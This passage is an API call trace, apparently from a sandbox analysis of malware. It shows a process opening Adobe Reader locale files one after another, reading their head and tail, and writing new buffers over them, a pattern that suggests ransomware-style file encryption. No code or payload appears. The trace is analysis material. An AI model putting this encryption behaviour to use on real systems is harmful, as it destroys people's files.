lpUsedDefaultChar=0x0) returned 13 [0071.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7366c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0071.588] ReadFile (in: hFile=0x1ec, lpBuffer=0x26bf2f8, nNumberOfBytesToRead=0xe6, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bf2f8*, lpNumberOfBytesRead=0x345f2bc*=0xe6, lpOverlapped=0x0) returned 1 [0071.588] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0071.589] WriteFile (in: hFile=0x1ec, lpBuffer=0x2662a28*, nNumberOfBytesToWrite=0x66e, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a28*, lpNumberOfBytesWritten=0x345f2d0*=0x66e, lpOverlapped=0x0) returned 1 [0071.589] CloseHandle (hObject=0x1ec) returned 1 [0071.589] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\BRdlang32.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\brdlang32.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0071.590] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.591] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3600 [0071.591] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.591] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.591] ReleaseMutex (hMutex=0x168) returned 1 [0071.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.HRV", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0071.591] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.HRV", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.HRV", lpUsedDefaultChar=0x0) returned 13 [0071.591] ReadFile (in: hFile=0x1ec, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.594] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2600 [0071.594] ReadFile (in: hFile=0x1ec, lpBuffer=0x2864a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2864a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.604] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2600 [0071.605] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.605] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0071.605] WriteFile (in: hFile=0x1ec, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0071.606] CloseHandle (hObject=0x1ec) returned 1 [0071.606] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\Multimedia.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\multimedia.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0071.607] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.607] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x13c00 [0071.607] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.607] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.607] ReleaseMutex (hMutex=0x168) returned 1 [0071.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.HRV", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0071.607] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.HRV", cchWideChar=14, lpMultiByteStr=0x1f7352c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.HRV", lpUsedDefaultChar=0x0) returned 14 [0071.608] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0071.612] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x12c00 [0071.612] ReadFile (in: hFile=0x1ec, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0071.614] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x12c00 [0071.615] WriteFile (in: hFile=0x1ec, lpBuffer=0x2865a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2865a88*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0071.616] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0071.616] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0071.616] CloseHandle (hObject=0x1ec) returned 1 [0071.616] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hr_HR\\SendMail.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hr_hr\\sendmail.hrv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0071.620] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.620] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x3c00 [0071.620] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0071.621] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0071.621] ReleaseMutex (hMutex=0x168) returned 1 [0071.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.HRV", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0071.621] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.HRV", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.HRV", lpUsedDefaultChar=0x0) returned 12 [0071.621] ReadFile (in: hFile=0x1dc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.044] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2c00 [0072.045] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.058] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2c00 [0072.060] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.077] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0072.078] WriteFile (in: hFile=0x1dc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.078] CloseHandle (hObject=0x1dc) returned 1 [0072.078] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\AdobeCollabSync.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\adobecollabsync.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0072.080] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0072.080] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1a00 [0072.080] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0072.080] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.080] ReleaseMutex (hMutex=0x168) returned 1 [0072.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.HUN", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0072.080] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdobeCollabSync.HUN", cchWideChar=19, lpMultiByteStr=0x1f88a64, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdobeCollabSync.HUN", lpUsedDefaultChar=0x0) returned 19 [0072.081] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0072.082] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0072.083] WriteFile (in: hFile=0x1dc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0072.083] CloseHandle (hObject=0x1dc) returned 1 [0072.083] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\IA32.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\ia32.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0072.084] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0072.085] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xe00 [0072.085] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0072.085] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.085] ReleaseMutex (hMutex=0x168) returned 1 [0072.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.HUN", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0072.085] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="IA32.HUN", cchWideChar=8, lpMultiByteStr=0x1f733cc, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="IA32.HUN", lpUsedDefaultChar=0x0) returned 8 [0072.085] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0xe00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f2bc*=0xe00, lpOverlapped=0x0) returned 1 [0072.087] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0072.087] WriteFile (in: hFile=0x1dc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1388, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f2d0*=0x1388, lpOverlapped=0x0) returned 1 [0072.088] CloseHandle (hObject=0x1dc) returned 1 [0072.088] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\hu_HU\\SaveAsRTF.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\hu_hu\\saveasrtf.hun"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0072.089] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0072.089] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4a00 [0072.090] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0072.090] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.090] ReleaseMutex (hMutex=0x168) returned 1 [0072.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.HUN", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0072.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SaveAsRTF.HUN", cchWideChar=13, lpMultiByteStr=0x1f732cc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SaveAsRTF.HUN", lpUsedDefaultChar=0x0) returned 13 [0072.090] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.092] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3a00 [0072.092] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.093] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3a00 [0072.093] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e978d8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e978d8*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.094] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0072.094] WriteFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0072.094] CloseHandle (hObject=0x1dc) returned 1 [0072.095] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\accessibility.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\accessibility.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0072.096] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0072.096] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb200 [0072.097] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0072.097] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.097] ReleaseMutex (hMutex=0x168) returned 1 [0072.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.ITA", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0072.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="accessibility.ITA", cchWideChar=17, lpMultiByteStr=0x1f88a64, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="accessibility.ITA", lpUsedDefaultChar=0x0) returned 17 [0072.097] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e93878, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesRead=0x345f278*=0x4000, lpOverlapped=0x0) returned 1 [0072.100] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa200 [0072.100] ReadFile (in: hFile=0x1dc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0072.101] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xa200 [0072.101] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0072.102] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0072.102] WriteFile (in: hFile=0x1dc, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f28c*=0x4000, lpOverlapped=0x0) returned 1 [0072.102] CloseHandle (hObject=0x1dc) returned 1 [0072.102] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\eBook.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\ebook.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0072.105] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0072.106] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x1a00 [0072.106] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0072.106] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0072.106] ReleaseMutex (hMutex=0x168) returned 1 [0072.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.ITA", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0072.106] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="eBook.ITA", cchWideChar=9, lpMultiByteStr=0x1f732cc, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eBook.ITA", lpUsedDefaultChar=0x0) returned 9 [0072.106] ReadFile (in: hFile=0x1dc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x345f2bc*=0x1a00, lpOverlapped=0x0) returned 1 [0072.108] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0072.109] WriteFile (in: hFile=0x1dc, lpBuffer=0x2662a08*, nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2662a08*, lpNumberOfBytesWritten=0x345f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0072.109] CloseHandle (hObject=0x1dc) returned 1 [0072.109] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\it_IT\\ReadOutLoud.ITA" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\it_it\\readoutloud.ita"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0072.110] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0072.110] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2c00 [0072.110] SetFilePointer (in: hFile=0x1dc, 